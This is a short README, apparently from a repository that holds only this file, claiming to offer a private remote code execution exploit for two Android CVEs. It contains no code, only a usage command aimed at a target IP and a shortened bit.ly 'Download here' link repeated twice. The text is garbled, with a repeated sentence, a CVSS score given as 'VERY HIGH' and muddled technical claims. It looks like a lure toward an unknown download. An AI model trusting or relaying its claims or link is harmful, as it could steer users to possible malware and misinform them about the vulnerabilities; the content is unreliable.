# CVE-2024-43093/43047: RCE in Android System.
## Overview
CVE-2024-43093 and CVE-2024-43047
## Exploit:
### [Download here](https://bit.ly/3AG3GCn)
## Details
- **CVE ID**: [CVE-2024-43047]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 7.8
- **CVE ID**: [CVE-2024-43093]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: VERY HIGH
## Vulnerability Description
CVE-2024-43093 is a critical vulnerability in the Android system.
Successful exploitation of the vulnerabilities could lead to remote code execution, denial of service, elevation of privilege or information disclosure on an affected system.
CVE-2024-43093 is a critical vulnerability in the Android system.
This critical vulnerability, reported as CVE-2024-43047 with a CVSS score of 7.8, is due to a Use-After-Free issue in the DSP algorithm service. It may cause memory corruption when saving the HLOS memory card or using RCE.
## Affected Versions
Android version 12, 12L, 13, 14 and 15
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### [Download here](https://bit.ly/3AG3GCn)
[4.0K] /data/pocs/281dfca942acd831e98f6990321dd05872809492
└── [1.3K] README.md
0 directories, 1 file